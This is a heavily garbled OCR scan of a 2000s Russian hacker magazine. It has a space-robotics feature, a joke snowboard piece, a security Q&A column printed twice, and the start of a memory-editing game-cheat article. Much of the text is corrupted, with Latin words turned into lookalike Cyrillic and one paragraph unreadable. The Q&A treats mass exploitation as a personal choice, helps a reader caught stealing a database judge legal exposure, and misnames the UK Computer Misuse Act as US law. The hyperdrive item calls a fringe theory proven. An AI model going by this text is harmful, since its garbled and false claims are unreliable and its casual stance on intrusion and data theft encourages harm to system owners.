ров, не считая тепловых, инерционных, дина- 
мометрических и прочих полезных датчиков. 
Снаружи робонавт защищен специальным 
сверхтвердым полимером. 

Хоть основным его мозгом является человек, 
у робонавта имеется свой довольно мощный 
процессор, способный к самообучению. Так 
что рутинные операции типа протяжки болтов 
на поверхности звездолета он может выпол- 
нять сам. 

Но, если нужно сделать что-то серьезное — 
космонавт берет шлем виртуальной реаль- 
ности, надевает специальные перчатки и 
бродит по поверхности корабля в виде робо- 
навта. ЫА8А планирует сделать робонавтов 
встроенными уже на поверхности космичес- 
ких кораблей в специальных ячейках, чтобы 
в нужный момент не отнимать драгоценное 
время на подготовку и выброс робота через 
шлюз. Может, такая профессия будет — пилот 
робонавта :). 




сизтамЕн* 
ш с ною 




ТЕТ ѴѴаІкег вживую 



ШТУРМ ЛЕДЯНОЙ ЕВРОПЫ 

У Юпитера есть интересный спутник — 
маленькая Луна-Европа, полностью покрытая 
настоящим льдом, под которым находится 
жидкая вода, подогретая жаром внутреннего 
ядра Луны. Среди планетологов бытует мне- 
ние, что в этой воде может быть примитивная 
жизнь: бактерии, простейшие (что-то типа 
амеб и инфузорий) и всякая другая мерзость. 
Чтобы быть точно в этом уверенным, нужно 
туда слетать и посмотреть, так как данных, 
полученных с зонда Саззіпі, пролетавшего 
недавно мимо Европы, недостаточно. Ну, 
естественно, сами мы туда лететь не будем 



- опять пошлем беспилотный зонд с роботом 
на борту. Цель робота — «приевропиться» 
на льду, просверлить в нем лунку, как это 
делают рыбаки, и запустить в недра жидко- 
го мрака робота-субмарину. Не стоит тебе 
объяснять, что эта задача не из непростых. 
Чтобы получить с Луны несколько сотен 
граммов лунного грунта, «Совок» запустил к 
ней 3 (!) специальных лунохода, и только один 
вернулся с успехом. Сейчас, конечно, время 
не то, есть опыт в конструировании летатель- 
ных аппаратов и беспилотных зондов, но все 
равно случаются промахи. Например, зонд 
Европейского Космического Агентства (ЕЗА), 
ВеадІе-2, благополучно разбился о Марс два 



года назад. Его останки, конечно, сейчас 
можно увидеть через другой зонд — Е8А 
Магз Ехргезз, но толку от этого мало. 

Для успешного проведения европейской 
миссии корабль планируют оснастить специ- 
альной системой искусственного интеллек- 
та, которая позволит сократить количество 
навигационных ошибок и принимать реше- 
ния в особо трудных ситуациях. До сих пор 
неизвестно, насколько глубокий лед окружа- 
ет Европу. Оценки в толщине ледяного пан- 
циря колеблются от пяти до ста километров. 
Многие ученые считают, что средняя толщи- 
на льда — 25 километров. Естественно, что 
при таком раскладе киберпосланец должен 
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Официальный сайт Робонавта: 

бНрЛ/ѵезиѵіиз.ізс.паза.аоѵ/ег ег/ИІтІ/гоЬопаиІ/гоЬопаиМНітіІ 

Интересный сайт, публикующий новости освоения космоса и хай- 
тека: 

М11р://\отѵѵѵ.1ѳсІіпоѵеІсіѵ.сот 




найти самое тонкое место, чтобы «присвер- 
литься». 

Но и тут ЫАЗА не дремлет. Тренироваться 
бурить лунки будем на Земле! Антарктическое 
озеро Восток по многим параметрам похоже 
на ледяную поверхность Европы, поэтому 
тренироваться гидроботы будут именно там. 
Пуск миссии намечается на 2010 — 2015 годы, 
так что через десяток лет у нас будет возмож- 
ность увидеть скользких тварей Европы, если 
они вообще существуют. 

ТО ЛИ ЕЩЕ БУДЕТ 

Совсем недавно в научных кругах появилась 
интересная работа физиков-теоретиков, 
Вальтера Дрешера и Йохима Хойезера, осно- 
ванная на старой теории физика Хайма. Он, в 
свою очередь, работал в области квантовой 
механики и общей теории относительности. 
Его работа доказывает возможность созда- 
ния гипердвигателя, с помощью которого кос- 
мические корабли будут летать с огромными 
скоростями. 

Если изложенные идеи физиков окажутся 
верными, то человечество сможет строить 
корабли, способные достичь Луны за считан- 
ные минуты, а Марса — за 2,5 часа. И что еще 
удивительнее, к звезде, лежащей в десят- 
ке световых лет от Земли, на такой машине 
можно будет долететь всего за 80 дней по 
земному и корабельному времени (и никаких 
парадоксов-близнецов). 

Одним словом, человечество теплит надежду 
на сверхсветовые полеты. Конечно, первыми 
пассажирами гиперкораблей будут роботы, 
так как нам с тобой в глубокий космос пока 
вредно. 



Следи за дальнейшими выпусками Хакера 
— космическая тема еще и не надкусана. В 
Импланте будут появляться статьи об освое- 
нии космоса и других интересных космичес- 
ких фитчах. 

вшдпѵ ѵоин’5 зс 



Сайт программы АІЧТ5: 
б1{р://апІ5.аз1с.паза.аоѵ/ 




Как работает система телеприсутствия робонавта — видео (3,2 
Мб): 

М1{р://ѵезиѵіи5.ізс.паза.аоѵ/ег ѳг/б{тІ/гоЬопаи{/ѵібео/1еІѳр2.аѵі 

Видео о том, как работает лунный АІМТ5 
ЬЦрУ/апІв.азІс.паза.аоѵ/ІеаІигев/І-АРіА Іап.тоѵ (27 Мб) 
бНрѴ/апІз.авІс.паза.аоѵ/ІеаІигез/ВоѵеТаІкег.тоѵ (78 Мб) 



Эволюция фрактальных роботов: 
ЬНр://апІ5.аз1с.паза.аоѵ/1еа1игевЯе1тап Еѵо бзі.тоѵ 



Саморемонт и деятельность в опасных ситуациях: 
Ы1р://ап1в.а5Іс.паза.аоѵ/1еа{иге5/Ьз{гевсие%20сІгаН.аѵі (99 Мб) 



Сборка различных строений: 

бЦрЛ/апІБ.азІс.паза.аоѵ/ІеаІигез/МапиІасІигеРгеІіт.тоѵ 




ЭАЫ6ЕВ! 



Действие больших доз радиации на у Д ^ де йствуют 
чено. Малых - гораздо меньше, и ^ на т ^ ^ на 
— не действуют» продолжаю подв ергаться действию не 

Марс организмы космонавтов у ' н0 и их воево3 можных 

только разных ионизирующи у 6ыть гора здо тяжелее, 

““ »” 

чем предполагается. В вызывает в организме 

необходимо. Облучение в м ^ при облучении боль- 

шого процессов, которые н в^™^^ Р обща я стрессовая 
шими дозами. Можно предп ’ ПОТО мков наблюдает- 

реакция организма. В п ^™^^ К р ^ичные воздействия. 
ОЯ их повышенная реакция популяция клеток, 

В принципе, возникает новы, , фенотип^ реакции 

У которых могут наблюдатьс Р я проблема при 

^еТос=Г^ 

ния у кандидатов. 
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ХАКЕР УЧИТ ///// І351ІЕ 



-Пропеллер -Чудо советской промышленности. 
Из титана, весит всего 3 кг. 



-Удобная жесткая рама 

чтобы Кирилл не устал выигрывать. 




-Двигатель- Одноцилиндровый, объем, как у пивной бутылки: 0,33. 
Крутящий момент 12 Нм. 



--Доска- Кирюха скользит юзом на заднем канте, 
выигрывая у соперников минуты отставания. 



-Регулятор подачи топлива то есть газ. Чуть 
нажал — и полетели. 



-Регулятор обратного хода в народе тормоз. 

Сломался он — Кирюхе уже не помочь. 



-Штаны из латекса чтобы ветер не задувал в карманы. 



ДОСКА С ПРОПЕЛЛЕРОМ 



КИРИЛЛ 

ИНЖЕНЕР-ПРОГРАММИСТ На проходивших в итальянском Турине Олимпийских играх вне основной сетки 

23 ГОДА соревнований по сноуборду выступал Кирилл — заядлый доскер, который проехал 

километровую трассу быстрее всех: ему понадобилось всего на 20 минут больше, чем 
американцу Шону Уайту. Такой феноменальный успех Кириллу обеспечило 
потрясающее изобретение советских инженеров. 




-Дочещка - К ней крепятся распорки. 
Удобная — при падении вся нагрузка 
передается Кириллу через нее. 



-Лямки- Крепкие — чтобы держались как следует при любых падениях. 



-Распорки- Тоже из титана. 

Помогают Кириллу чувствовать себя увереннее. 




-Обруч- Упругий, из титана. Полтора метра радиусом. | 

Если вдруг Кирилл потеряет равновесие, то обруч защитит его 1 

от повреждений. Поэтому Кирилл не боится кататься с горок! -Доска- Кирилл ее спер у приятеля. 



СЕКРЕТ УСПЕХА 



После такого успеха на Олимпиаде всем стало интересно узнать немного больше 
о Кирилле: как он добился таких высот, кто его тренировал, как проходили занятия. 
Специально для нашего журнала Кирилл согласился открыть секрет своего успеха. 
Как ты и ожидал, дело опять не обошлось без хитроумных приспособлений. 




НАСК-РА* 



О: Что такое зесигеіеѵеі и какой с него прок? 

А: Зесигеіеѵеі — концепт, который можно разыс- 
кать в В8Э- и Ыпих-системах. Это позволяет изме- 
нить уровень безопасности, реакцию на разнооб- 
разные вызовы (саііз) системы. Чем выше уровень, 
тем, как водится, ощутимее ограничения. Ограниче- 
ния можно расписывать вручную, модифицируя 
системные файлы. При этом помни, что чуткость 
Пингвиньих настроек будет отличной от ВЗЭ’шных. 
Можно и выбирать «решение под ключ» — два раз- 
ных базовых уровня, зесигеіеѵеі 1 и зесигеіеѵеі 2 
(есть и нулевой уровень, который означает, что 
система отключена). Более детально с концептом 
можно ознакомиться на ѵѵѵѵѵѵ.орепЬзсІ.ога/саі- 
Ып/тап.саі? диегѵ=зесигеІеѵеІ . Стоит отметить, что 
ВЗЭ постепенно отказывается от описанной идеи 
и, к примеру, перестают латать дырки. После появ- 
ления последней уязвимости ОрепВЗЭ-творцы 
официально отказались решить проблему. 

О: Мы нашли серьезную уязвимость в известном 
ѵѵіп-софте. Лучше начать использовать ее для 
захвата компов или же слить инфо в багтрак? 

А: Вопрос очень интимный, и каждый выбирает оп- 
тимальное для себя решение. Стоит помнить, с ка- 
кой целью собиралась ваша исследовательская 
бригада. Если целью остается сиюминутная выгода 
и пьянящее чувство контроля над несметными ты- 
сячами компов, то ответ очевиден. Если же вы хоти- 
те собрать очки на международной сцене, то мож- 
но сразу распространять инфо с обязательным 
обозначением копирайтов. Бонусом станет написа- 
ние эксплойта по теме, который поможет донести 
весть о вашей крутости до самых низов компьютер- 
ного сообщества. Если же вы решили закрепиться 
совсем капитально, то нужно встать на место 
@3іаке и Р-Зесиге, при этом инфу полагается сна- 
чала отдать производителю софта. С информацией 
выдается таймаут (2 — 7 дней), чтобы кодеры успели 
залатать дыру до залива твоей инфы в Ьидігад. Это 
момент также помогает закреплению приятельских 
отношений с программерами софта, иногда веду- 
щих к дальнейшему трудоустройству. 

а: Каков порядок выхода ХР ЗРЗ и Ѵізіа’ы? 
Будет безопаснее первый или второй вариант? 

А: Во-первых, разобраться в порядке выхода, если 
подобный когда-либо существовал у М3, почти не- 
возможно. Во-вторых, исключительно практика пока- 
жет, что будет безопаснее; непредсказуемость про- 
дуктов конторы очевидна. По моему мнению, вариант 
с ЗРЗ несет меньше опасности, так как это будет зап- 
латкой на уже хорошо изученную платформу; во вто- 
рую перетряску всего и вся а-Іа ЗР2 верить не хочет- 
ся. Ѵізіа же может получиться черной лошадкой, 
секъюрность которой придется налаживать «ручка- 
ми». Текущая ситуация такова, что сначала выйдет 
Ѵізіа во второй половине 2006. Потом же выкатят 
третью заплатку для ХР, очевидно, во второй полови- 
не 2007. Неопределенности прибавляют предыду- 
щие заявления фирмы, когда Стив Баллмер клялся и 
божился выдать ЗР еще до выхода І_опдІюгп’а. 

О: Какие зесигііу-фишечки принесет Ѵізіа в отноше- 
нии юзерских аккаунтов? 

А: Несмотря на то, что главный девиз новой систе- 
мы — удобство пользователя и работы с инфор- 
мацией, новый релиз привнесет нового и по теме 
безопасности. Изменится система выдачи приви- 
легий юзерам. Не будет нужды постоянно рабо- 
тать под «Администратором», чтобы инсталлиро- 
вать и работать со специальным софтом. Тема бу- 



дет настраиваться через ІІзег Ассоипі Ргоіесііоп, 
которая доступна уже в Веіа 1 новой операцион- 
ки. Таким образом, ты будешь просто запрошен 
дополнительно о разрешении на установку соф- 
та. Данный концепт, почерпнутый из МасОЗ, ока- 
жется рабочей преградой зруѵѵаге’у и абѵѵаге’у, 
хотя и займет немного больше юзерского време- 
ни. Также каждый юзер будет иметь свое храни- 
лище ѴігШаІ Зіоге, куда будут складываться все 
изменения системы, — записи в реестр и инфа, 
добавленная в разделы ограниченного доступа, 
которые произошли во время пользования конк- 
ретного юзера. Так что все изменения системы 
должен почувствовать лишь сам юзер. Понятно, 
что могут появиться и новые темы, когда в загре- 
бущие лапы тестеров попадутся убедительные 
ВС-версии системы. 

О: Решатся ли старые проблемы с выходом ІЕ7? 

А: Стоит отметить, что распространенная доныне 
Веіа 1 не принесла много нового по теме безопас- 
ности. Веіа 2, предполагается, заполучит апіі- 
рНізІііпд средства, сродни тому, что заряжено в 
АОІ_ Ыеізсаре 8. Ргоіесіесі Мобе покажет, что іех- 
ріоге.ехе не может делать все и вся, если он был 
занесен в группу «Доверенных» ТігеѵѵаІГа. Отдель- 
ные операции потребуют дополнительного подт- 
верждения со стороны юзера; данным способом 
можно будет отсечь массу паразитов, что так и но- 
ровят вписаться в твою систему. С подобным ре- 
шением главной окажется психологическая обра- 
ботка юзеров, которые будут уделять больше вни- 
мания зесигііу-предупреждениям системы. 

О: Чего ѳщѳ нового ждать по Вистѳ? 

Как нас будут оборонять? 

А: Система ІЧАР, что объявилась в поставке ѴѴіпбоѵѵз 
2003, расшифровываясь как Ыеіѵѵогк Ассезз 
Ргоіесііоп, теперь будет вписана и сюда. Система 
чем-то напоминает Сізсо ІЧеѣл/огк Ассезз Сопігоі 
Ргодгагл, что составляет требования по доступу кли- 
ентам Сети еще до подключения. Например, можно 
запросить наличие необходимых патчей, список ус- 
тановленного софта, свежесть базы антивируса. На 
самом деле, система может спросить о чем угодно. 
Самое светлое будущее системы — установка по- 
добной клиент-ІЧАР связки на уровне провайдеров 
так, чтобы в Сеть не попали люди с незащищенны- 
ми (то есть потенциальными носителями заразы и 
троянской конюшни) компами. Теперь системный 
РігеѵѵаІІ будет успешно фильтровать исходящий 
трафик. Система будет анализировать весь уста- 
новленный софт, изначально понимая, какими 
конкретно сетевыми ресурсами (ТСР-портами, к 
примеру) пользуется прога; будет отсекать все ос- 
тальные активности в Интернете. ЕРЗ-система 
шифрования будет развиваться и дальше, а также 
будет интегрирован таіѵѵаге-сканер с возмож- 
ностью дальнейшего излечения. 

О: Может ли гооікіі быть записан в ВІ05? 

А: Все помнят вирус Чернобыль (СІН) 1998 года? 
Кто помнит, тот вопроса не задаст, так как переп- 
рограммированием биоса можно творить чудеса. 
Для управления АбѵапсесІ Сопіідигаііоп апб Роѵѵег 
ІпІегГасе используется свой высокоуровневый 
язык, на котором можно написать тот же самый рут- 
кит. В дальнейшем программка будет храниться в 
памяти ВІОЗ’а. Пока готовых образцов я не видел, 
но зесигііу-эксперты сходятся во мнении, что это 
лишь вопрос времени. Самые современные мамки 
поддерживают работу с АСРІ МасЫпе Бапдиаде 
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(АМ1_) и АСРІ Зоигсе Бапдиаде (АЗІ_), которые раск- 
рывают еще большие горизонты для написания 
софта, управляющего железом системы. Серьез- 
ным тормозом для распространения темы остаются 
)итрег’ы, которые нужно физически двигать перед 
перепрошивкой. Сам по себе руткит не причинит 
большого вреда, если он, конечно, не взаимодей- 
ствует с операционкой, а именно туда ему надо бу- 
дет передать дальнейшие команды. Передача же 
может быть осуществлена без особых проблем на 
самые разные системы — руткит будет легко пор- 
тироваться под любую Ось. 

О: Какие базовые шаги я могу предпринять по 
обеспечению безопасности своего РТР-серванта 
под Виндой? 

А: Не ставить этот сервер под ѴѴіп :). Если же аль- 
тернативные решения оказываются недоступны, 
то могу предложить последующие простые, но 
эффективные меры. Не вводи РТР в домен, ос- 
тавь его в рабочей группе. Не стоит поднимать 
РТР на машине, где уже крутится контроллер до- 
мена или Ехсіпапде. Запрети анонимный доступ. 
Корень сервера направь на партицию диска, от- 
личную от той, где стоит ОС. Проверь, включена 
ли политика блокировки аккаунтов (І_оскоиі роіі- 
су). Так ты предотвратишь атаку грубой силой, 
когда хакер будет пытаться подобрать пароль; 
после тройки неудачных попыток логин будет 
заблокирован на некоторое время. Постарайся 
оставить доступ только с надежных хостов, кото- 
рыми пользуются лишь законные юзеры; в том 
поможет ТСР ѵѵгаррегз. Не стоит логиниться на 
свой сервер с непроверенных машин и сетей, 
так как тамошняя клава может мониториться, а 
трафик снифаться... После подобных «внебрач- 
ных связей» со своим РТР обязательно меняй па- 
роли. Тему надежных паролей даже не стану об- 
суждать. 

О: Нас попалили при похищении БД с американско- 
го сервера. Тамошние админы пугают судом по аме- 
риканским законам. Чего нам там пришить могут? 

А: Стоит помнить, что американские законы не 
распространяются на судебные разбиратель- 
ства в Отечестве. Они могут быть использованы 
как идея, подсказка о возможном решении, но 
не более того. Другое дело, если очень захочет- 
ся покататься на горках Диснейленда или сфо- 
тографироваться у статуи Свободы. Тогда после 
пересечения границы можно отправиться в мес- 
та, по американским меркам, неотдаленные. 
Законов по ИТ там тьма-тьмущая, в отличие от 
неуклюжего российского УК. Однако львиная 
доля подобных дел решается с Сотриіег 
Мізизе Асі 1990 с. 18 (Акт компьютерных прес- 
туплений/злоупотреблений, глава 18), который 
описывает 1) неправомерный доступ к компью- 
терным материалам, 2) неправомерный доступ 
с намерением нанесения дальнейшего ущерба, 
3) подмена и модификация материалов. 

О: Настроил локальный сервер, которым никто 
из чужих не пользуется, но никак не могу отк- 
лючить дѳфолтовый ІігеѵѵаІІ. 

А: Наиболее простым решением выглядит включе- 
ние файрвола, чтобы система не плакала об отсу- 
тствии оного. Во включенном же РѴѴ ты просто 
включишь опцию аііоѵѵ еѵегуіЫпд (позволять все), 
которая сделает все желанные порты открытыми 
и доступными, как провинциальная нимфоманка :). 

ВШАПУ УОІЛГ5 ~5Г 
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НАСК-РА* 



О: Что такое зесигеіеѵеі и какой с него прок? 

А: Зесигеіеѵеі — концепт, который можно разыс- 
кать в В8Э- и Ыпих-системах. Это позволяет изме- 
нить уровень безопасности, реакцию на разнооб- 
разные вызовы (саііз) системы. Чем выше уровень, 
тем, как водится, ощутимее ограничения. Ограниче- 
ния можно расписывать вручную, модифицируя 
системные файлы. При этом помни, что чуткость 
Пингвиньих настроек будет отличной от ВЗЭ’шных. 
Можно и выбирать «решение под ключ» — два раз- 
ных базовых уровня, зесигеіеѵеі 1 и зесигеіеѵеі 2 
(есть и нулевой уровень, который означает, что 
система отключена). Более детально с концептом 
можно ознакомиться на ѵѵѵѵѵѵ.орепЬзсІ.ога/саі- 
Ып/тап.саі? диегѵ=зесигеІеѵеІ . Стоит отметить, что 
ВЗЭ постепенно отказывается от описанной идеи 
и, к примеру, перестают латать дырки. После появ- 
ления последней уязвимости ОрепВЗЭ-творцы 
официально отказались решить проблему. 

О: Мы нашли серьезную уязвимость в известном 
ѵѵіп-софте. Лучше начать использовать ее для 
захвата компов или же слить инфо в багтрак? 

А: Вопрос очень интимный, и каждый выбирает оп- 
тимальное для себя решение. Стоит помнить, с ка- 
кой целью собиралась ваша исследовательская 
бригада. Если целью остается сиюминутная выгода 
и пьянящее чувство контроля над несметными ты- 
сячами компов, то ответ очевиден. Если же вы хоти- 
те собрать очки на международной сцене, то мож- 
но сразу распространять инфо с обязательным 
обозначением копирайтов. Бонусом станет написа- 
ние эксплойта по теме, который поможет донести 
весть о вашей крутости до самых низов компьютер- 
ного сообщества. Если же вы решили закрепиться 
совсем капитально, то нужно встать на место 
@3іаке и Р-Зесиге, при этом инфу полагается сна- 
чала отдать производителю софта. С информацией 
выдается таймаут (2 — 7 дней), чтобы кодеры успели 
залатать дыру до залива твоей инфы в Ьидігад. Это 
момент также помогает закреплению приятельских 
отношений с программерами софта, иногда веду- 
щих к дальнейшему трудоустройству. 

а: Каков порядок выхода ХР ЗРЗ и Ѵізіа’ы? 
Будет безопаснее первый или второй вариант? 

А: Во-первых, разобраться в порядке выхода, если 
подобный когда-либо существовал у М3, почти не- 
возможно. Во-вторых, исключительно практика пока- 
жет, что будет безопаснее; непредсказуемость про- 
дуктов конторы очевидна. По моему мнению, вариант 
с ЗРЗ несет меньше опасности, так как это будет зап- 
латкой на уже хорошо изученную платформу; во вто- 
рую перетряску всего и вся а-Іа ЗР2 верить не хочет- 
ся. Ѵізіа же может получиться черной лошадкой, 
секъюрность которой придется налаживать «ручка- 
ми». Текущая ситуация такова, что сначала выйдет 
Ѵізіа во второй половине 2006. Потом же выкатят 
третью заплатку для ХР, очевидно, во второй полови- 
не 2007. Неопределенности прибавляют предыду- 
щие заявления фирмы, когда Стив Баллмер клялся и 
божился выдать ЗР еще до выхода І_опдІюгп’а. 

О: Какие зесигііу-фишечки принесет Ѵізіа в отноше- 
нии юзерских аккаунтов? 

А: Несмотря на то, что главный девиз новой систе- 
мы — удобство пользователя и работы с инфор- 
мацией, новый релиз привнесет нового и по теме 
безопасности. Изменится система выдачи приви- 
легий юзерам. Не будет нужды постоянно рабо- 
тать под «Администратором», чтобы инсталлиро- 
вать и работать со специальным софтом. Тема бу- 



дет настраиваться через ІІзег Ассоипі Ргоіесііоп, 
которая доступна уже в Веіа 1 новой операцион- 
ки. Таким образом, ты будешь просто запрошен 
дополнительно о разрешении на установку соф- 
та. Данный концепт, почерпнутый из МасОЗ, ока- 
жется рабочей преградой зруѵѵаге’у и абѵѵаге’у, 
хотя и займет немного больше юзерского време- 
ни. Также каждый юзер будет иметь свое храни- 
лище ѴігШаІ Зіоге, куда будут складываться все 
изменения системы, — записи в реестр и инфа, 
добавленная в разделы ограниченного доступа, 
которые произошли во время пользования конк- 
ретного юзера. Так что все изменения системы 
должен почувствовать лишь сам юзер. Понятно, 
что могут появиться и новые темы, когда в загре- 
бущие лапы тестеров попадутся убедительные 
ВС-версии системы. 

О: Решатся ли старые проблемы с выходом ІЕ7? 

А: Стоит отметить, что распространенная доныне 
Веіа 1 не принесла много нового по теме безопас- 
ности. Веіа 2, предполагается, заполучит апіі- 
рНізІііпд средства, сродни тому, что заряжено в 
АОІ_ Ыеізсаре 8. Ргоіесіесі Мобе покажет, что іех- 
ріоге.ехе не может делать все и вся, если он был 
занесен в группу «Доверенных» ТігеѵѵаІГа. Отдель- 
ные операции потребуют дополнительного подт- 
верждения со стороны юзера; данным способом 
можно будет отсечь массу паразитов, что так и но- 
ровят вписаться в твою систему. С подобным ре- 
шением главной окажется психологическая обра- 
ботка юзеров, которые будут уделять больше вни- 
мания зесигііу-предупреждениям системы. 

О: Чего ѳщѳ нового ждать по Вистѳ? 

Как нас будут оборонять? 

А: Система ІЧАР, что объявилась в поставке ѴѴіпбоѵѵз 
2003, расшифровываясь как Ыеіѵѵогк Ассезз 
Ргоіесііоп, теперь будет вписана и сюда. Система 
чем-то напоминает Сізсо ІЧеѣл/огк Ассезз Сопігоі 
Ргодгагл, что составляет требования по доступу кли- 
ентам Сети еще до подключения. Например, можно 
запросить наличие необходимых патчей, список ус- 
тановленного софта, свежесть базы антивируса. На 
самом деле, система может спросить о чем угодно. 
Самое светлое будущее системы — установка по- 
добной клиент-ІЧАР связки на уровне провайдеров 
так, чтобы в Сеть не попали люди с незащищенны- 
ми (то есть потенциальными носителями заразы и 
троянской конюшни) компами. Теперь системный 
РігеѵѵаІІ будет успешно фильтровать исходящий 
трафик. Система будет анализировать весь уста- 
новленный софт, изначально понимая, какими 
конкретно сетевыми ресурсами (ТСР-портами, к 
примеру) пользуется прога; будет отсекать все ос- 
тальные активности в Интернете. ЕРЗ-система 
шифрования будет развиваться и дальше, а также 
будет интегрирован таіѵѵаге-сканер с возмож- 
ностью дальнейшего излечения. 

О: Может ли гооікіі быть записан в ВІ08? 

А: Все помнят вирус Чернобыль (СІН) 1998 года? 
Кто помнит, тот вопроса не задаст, так как переп- 
рограммированием биоса можно творить чудеса. 
Для управления АбѵапсесІ Сопіідигаііоп апб Роѵѵег 
ІпІегГасе используется свой высокоуровневый 
язык, на котором можно написать тот же самый рут- 
кит. В дальнейшем программка будет храниться в 
памяти ВІОЗ’а. Пока готовых образцов я не видел, 
но зесигііу-эксперты сходятся во мнении, что это 
лишь вопрос времени. Самые современные мамки 
поддерживают работу с АСРІ МасЫпе Бапдиаде 
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(АМ1_) и АСРІ Зоигсе Бапдиаде (АЗІ_), которые раск- 
рывают еще большие горизонты для написания 
софта, управляющего железом системы. Серьез- 
ным тормозом для распространения темы остаются 
)итрег’ы, которые нужно физически двигать перед 
перепрошивкой. Сам по себе руткит не причинит 
большого вреда, если он, конечно, не взаимодей- 
ствует с операционкой, а именно туда ему надо бу- 
дет передать дальнейшие команды. Передача же 
может быть осуществлена без особых проблем на 
самые разные системы — руткит будет легко пор- 
тироваться под любую Ось. 

О: Какие базовые шаги я могу предпринять по 
обеспечению безопасности своего РТР-серванта 
под Виндой? 

А: Не ставить этот сервер под ѴѴіп :). Если же аль- 
тернативные решения оказываются недоступны, 
то могу предложить последующие простые, но 
эффективные меры. Не вводи РТР в домен, ос- 
тавь его в рабочей группе. Не стоит поднимать 
РТР на машине, где уже крутится контроллер до- 
мена или Ехсіпапде. Запрети анонимный доступ. 
Корень сервера направь на партицию диска, от- 
личную от той, где стоит ОС. Проверь, включена 
ли политика блокировки аккаунтов (І_оскоиі роіі- 
су). Так ты предотвратишь атаку грубой силой, 
когда хакер будет пытаться подобрать пароль; 
после тройки неудачных попыток логин будет 
заблокирован на некоторое время. Постарайся 
оставить доступ только с надежных хостов, кото- 
рыми пользуются лишь законные юзеры; в том 
поможет ТСР ѵѵгаррегз. Не стоит логиниться на 
свой сервер с непроверенных машин и сетей, 
так как тамошняя клава может мониториться, а 
трафик снифаться... После подобных «внебрач- 
ных связей» со своим РТР обязательно меняй па- 
роли. Тему надежных паролей даже не стану об- 
суждать. 

О: Нас попалили при похищении БД с американско- 
го сервера. Тамошние админы пугают судом по аме- 
риканским законам. Чего нам там пришить могут? 

А: Стоит помнить, что американские законы не 
распространяются на судебные разбиратель- 
ства в Отечестве. Они могут быть использованы 
как идея, подсказка о возможном решении, но 
не более того. Другое дело, если очень захочет- 
ся покататься на горках Диснейленда или сфо- 
тографироваться у статуи Свободы. Тогда после 
пересечения границы можно отправиться в мес- 
та, по американским меркам, неотдаленные. 
Законов по ИТ там тьма-тьмущая, в отличие от 
неуклюжего российского УК. Однако львиная 
доля подобных дел решается с Сотриіег 
Мізизе Асі 1990 с. 18 (Акт компьютерных прес- 
туплений/злоупотреблений, глава 18), который 
описывает 1) неправомерный доступ к компью- 
терным материалам, 2) неправомерный доступ 
с намерением нанесения дальнейшего ущерба, 
3) подмена и модификация материалов. 

О: Настроил локальный сервер, которым никто 
из чужих не пользуется, но никак не могу отк- 
лючить дѳфолтовый ІігеѵѵаІІ. 

А: Наиболее простым решением выглядит включе- 
ние файрвола, чтобы система не плакала об отсу- 
тствии оного. Во включенном же РѴѴ ты просто 
включишь опцию аііоѵѵ еѵегуіЫпд (позволять все), 
которая сделает все желанные порты открытыми 
и доступными, как провинциальная нимфоманка :). 

ВШАПУ УОІЛГ5 ~5Г 
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ТЕХТ КРИС КАСПЕРСКИ АКА МЫЩЪХ 

ВЕЧНО ЖИТЬ 
НЕ ЗАПРЕТИШЬ 

ВЗЛОМ КОМПЬЮТЕРНЫХ ИГР 
СВОИМИ РУКАМИ 



ПОЛУЧИТЬ БЕССМЕРТИЕ 
И ПОЛНЫЙ БОЕКОМ- 
ПЛЕКТ ПРАКТИЧЕСКИ 
В ЛЮБОЙ ИГРЕ — ЭТО 
СОВСЕМ НЕСЛОЖНО! 
ПОТРЕБУЕТСЯ ВСЕГО 
ЛИШЬ НЕХ-РЕДАКТОР 
И НЕСКОЛЬКО МИНУТ 
СВОБОДНОГО ВРЕМЕНИ. 
СЕГОДНЯ ПРОБИЛ ЧАС: 
КРИС КАСПЕРСКИ ПОДЕ- 
ЛИТСЯ С ТОБОЙ ДРЕВ- 
НИМИ АЛХИМИЧЕСКИМИ 
РЕЦЕПТАМИ, ДОШЕДШИ- 
МИ ДО НАС СО ВРЕМЕН 
2Х-8РЕСТРЫМ И НАКО- 
ПИВШИМИ ОГРОМНЫЙ 
ПОТЕНЦИАЛ. 




ВЕЧНАЯ ЖИЗНЬ 

Что хорошего в вечной жизни? Да ничего в 
ней хорошего нет, если разобраться! Это же 
сплошные напряги и тоска смертная. Никакого 
тебе суицида, только бесконечные патроны. 1/1 
сердце не екнет при случке с монстром, появ- 
ляющимся как раз тогда, когда боезапас на 
исходе и здоровья нет ни хрена. Взломанная 
игра теряет свое очарование. Но все-таки без 
взлома никакое хорошее дело не обходится, 
так как он интересен сам по себе, с техничес- 
кой точки зрения. 

РЕЦЕПТ БЕССМЕРТИЯ 

Рецепт бессмертия обычно представляет 
манускрипт со смещением ячейки, которую 
необходимо хакнуть, прописав сюда мак- 
симальное количество жизней или заменив 
инструкцию ОБО на І\ІОР. Как найти эту 
магическую позицию в многомегабайтной 
мешанине кода и данных? Некоторые ска- 
жут: «Взять дизассемблер и проанализиро- 
вать программу», но... современные игры 
так велики, что этот проект даже не обсуж- 
дается. Пошлем таких советчиков подальше, 
а сами пойдем более разумным путем. 

ОБЩАЯ ТАКТИКА И СТРАТЕГИЯ 

Как несложно догадаться, патроны, жизни, 
артефакты и прочее барахло — все это пере- 
менные, хранящиеся в определенных ячейках. 
С точки зрения компьютера, эти ячейки ничем 



К сожалению, мы не смогли напечатать пол- 
ную версию статьи в журнале. Поэтому ты 
можешь спокойно найти ее на нашем диске. 
Там же, естественно, ты найдешь не только 
все исходники к статье, но и весь упомянутый 



не отличаются от огромного множества осталь- 
ных, содержащих в себе координаты монстров, 
текстуры и прочие объекты игрового мира. Как 
установить, за что отвечает та или иная ячейка? 
Самое простое, что приходит в голову — прос- 
то методично изменять одну ячейку за другой, 
наблюдая за реакцией игры. Зная точное коли- 
чество жизней/патронов, можно значительно 
сузить круг поиска, исследуя только те ячейки, 
которые содержат нужное значение. Однако 
следует помнить, что соответствие может быть 
как прямым, так и обратным. Одни программис- 
ты ведут учет жизней, другие — смертей, при- 
чем отсчет может вестись как от единицы, так и 
от нуля, а в некоторых случаях и -1 . Допустим, у 
нас есть три нерастраченных жизни. Означает 
ли это, что переменная Ііѵе_соип( обязательно 
будет равна трем? Разумеется, нет! Она впол- 
не может быть равна 2-м (игра заканчивается, 
когда Ііѵе_соипІ < 0) или нулю (игра заканчи- 
вается при Ііѵе_соип( > 2). Возможны и другие 
значения. С патронами в этом плане все обсто- 
ит намного лучше и чаще всего они хранятся в 
памяти, однако количество ложных срабатыва- 
ний все равно будет очень велико! Допустим, у 
нас есть 50 патронов, и мы ищем 32И в дампе 
